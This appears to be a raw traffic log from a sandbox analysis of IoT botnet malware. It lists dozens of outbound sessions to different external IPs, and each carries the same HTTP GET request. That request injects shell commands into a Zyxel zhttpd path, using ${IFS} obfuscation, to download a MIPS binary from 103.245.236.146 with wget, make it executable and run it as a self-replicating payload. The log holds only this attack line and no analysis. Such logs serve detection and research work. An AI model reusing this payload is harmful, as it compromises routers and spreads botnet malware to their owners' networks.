                                                        Jan 28, 2024 10:12:57.488975048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5484192.168.2.14338142.24.134.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.488986015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5485192.168.2.1432954143.178.200.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489027023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5486192.168.2.145212662.56.122.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489042044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5487192.168.2.1436052177.7.151.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489074945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5488192.168.2.1451006103.24.37.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489123106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5489192.168.2.144877212.42.217.94443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489161968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5490192.168.2.1457312196.200.255.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489197016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5491192.168.2.1453162177.204.120.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489240885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5492192.168.2.144315472.220.64.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489270926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5493192.168.2.1435810162.102.151.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489324093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5494192.168.2.1449882143.182.113.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489347935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5495192.168.2.144210285.18.116.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489399910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5496192.168.2.145074295.237.213.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489432096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5497192.168.2.144932434.180.70.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489451885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5498192.168.2.1458420152.48.54.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489514112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5499192.168.2.1441434153.22.141.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489567995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5500192.168.2.1460746114.118.182.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489598989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5501192.168.2.1433294179.139.171.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489628077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5502192.168.2.1433750112.44.234.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489681005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5503192.168.2.144296640.122.141.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489728928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5504192.168.2.1449900174.106.152.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489836931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5505192.168.2.1455690211.215.236.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489854097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5506192.168.2.1448638199.14.244.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489897966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5507192.168.2.1448364162.88.253.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489932060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5508192.168.2.144880296.94.130.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.489958048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5509192.168.2.1435630182.163.107.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490017891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5510192.168.2.1457682111.104.23.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490051031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5511192.168.2.145139431.208.15.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490102053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5512192.168.2.1459456165.213.203.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490132093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5513192.168.2.144618872.75.88.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490165949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5514192.168.2.143328296.100.179.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490209103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5515192.168.2.1436266193.158.96.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490250111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5516192.168.2.143305851.153.164.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490295887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5517192.168.2.1451836109.116.178.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490351915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5518192.168.2.146019064.221.241.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490355015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5519192.168.2.146079451.231.105.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490422010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5520192.168.2.1436604197.191.158.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490432024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5521192.168.2.145962083.9.193.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490458965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5522192.168.2.14557762.1.27.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490511894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5523192.168.2.145708827.148.159.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490544081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5524192.168.2.1441666211.134.60.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490570068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5525192.168.2.1445292178.71.20.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490612984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5526192.168.2.1438522191.18.251.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490650892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5527192.168.2.145707869.47.179.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490670919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5528192.168.2.1456468122.45.208.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490712881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5529192.168.2.1454922111.207.195.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490735054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5530192.168.2.1443942132.15.219.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490801096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5531192.168.2.144925647.212.225.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490845919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5532192.168.2.1454964168.159.223.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490910053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5533192.168.2.1447170118.44.116.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490951061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5534192.168.2.145567019.167.25.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.490972996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5535192.168.2.14379821.64.47.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491018057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5536192.168.2.144549677.37.79.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491074085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5537192.168.2.143385242.119.146.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491122007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5538192.168.2.144369280.17.164.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491167068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5539192.168.2.1435072192.236.24.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491208076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5540192.168.2.1435176150.250.107.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491224051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5541192.168.2.1441060154.125.134.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491270065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5542192.168.2.1432998133.46.203.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491306067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5543192.168.2.1433488166.182.34.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491332054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5544192.168.2.1440076139.166.253.92443
                                                        TimestampBytes transferredDirectionData
